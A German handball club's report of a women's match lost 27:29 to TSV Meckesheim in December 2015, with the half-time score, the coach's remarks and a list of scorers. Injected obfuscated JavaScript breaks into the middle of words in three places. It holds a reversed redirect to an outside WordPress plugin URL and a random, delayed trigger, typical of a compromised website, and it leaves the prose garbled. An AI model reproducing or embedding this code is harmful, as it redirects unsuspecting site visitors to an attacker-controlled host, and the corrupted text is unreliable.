Nachdem Torhüterin Sina Mulawa immer noch verletzt ist und Kira Höfer an dem gestrigen Tag nicht konnte, überlegten die Damen des TV Neckargemünd das Spiel gegen den Tabellenführer aus Meckesheim zu verschieben. Zum Glück entschied sich die Mannschaft doch dagegen. (Tabelle/Ergebnisse, Spielbericht)
Neckargemünd, 14.12.15 (kkn) – Beide Mannschaften starteten gut in das Spiel. Technische Fehler und Fehlpässe waren mit von der Partie. Die Mannschaften waren immer wieder toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torgleich. Die Abwehr des TVN stand kompakt und es wurde sich ordentlich ausgeholfen. Eine starke Sandra Pabst im Tor hat auch einige Paraden hinlegen können. An dieser Stelle ein riesen DANKE und Hut ab für unsere liebe Sandra, die sich nach nur zweimaligem Towart- Training mutig in das Tor gestellt hat. Leider wurde der Angriff der Damen, wie im letzten Spiel auch, sehr früh durch die Schiedsrichterin unterbrochen, sodass viele Tore nicht zustande kommen konnten. In die Halbzeitpause ging es mit 12:12.
Trainer Tomislav Uremovic betoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonte nochmals, dass wir nichts zu verlieren haben. Wir sollen den Block verbessern, die technischen Fehler vermeiden und schauen was die Torfrau macht. Auf das Spielfeld gehen, Spaß haben und zeigen was wir können.
2. Halbzeit
Nun kam der Joker vom TSV Meckesheim ins Spiel, die Spielerin konnte leider in 28 Minuten 6 Tore erzielen. Trotzdem machten die Damen des TVN die ersten 10 Minuten da weiter wo sie aufgehört hatten. Bis zum 18:18 lag die Heimmannschaft immer mit einem Tor vorne. Dann kam der bekannte Einbruch und es stand in der 52. Minute plötzlich 20:26. 24:28 in der 58. Minute. Wäre das Spiel 2 Minuten länger gegangen hätten die Neckargemünder Damen evtl wenigstens 1 Punkt behalten können. So ging das Spiel leider 27:29 aus.
Trotzdem war es ein gutes Spiel und wir sind froh dass die Damen ihr Tief überstanden haben. Nun kann dem nächsten Spiel, welches am Samstag, den 09.01.16, zu Gast bei der SG Kirchheim, um 18:00 Uhr , stattfindet, entgegen gefiebert werden. Hier wollen die Damen des TVN endlich wieder 2 Punkte auf ihrem Kontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to verbuchen.
Wir wünschen allen unseren Fans, Zuschauern, Gönnern und Helfern frohe Weihnachten, besinnliche Feiertage und einen guten Start in das neue Jahr 2016!
Es spielten:
Im Tor: Pabst
Im Feld: Koch (12/4), Knauf (1), Maier (8), Ebert (2), Drescher (1), Klingenberg (1), Schimek, Weitzel, Capriglione, Bucher (2)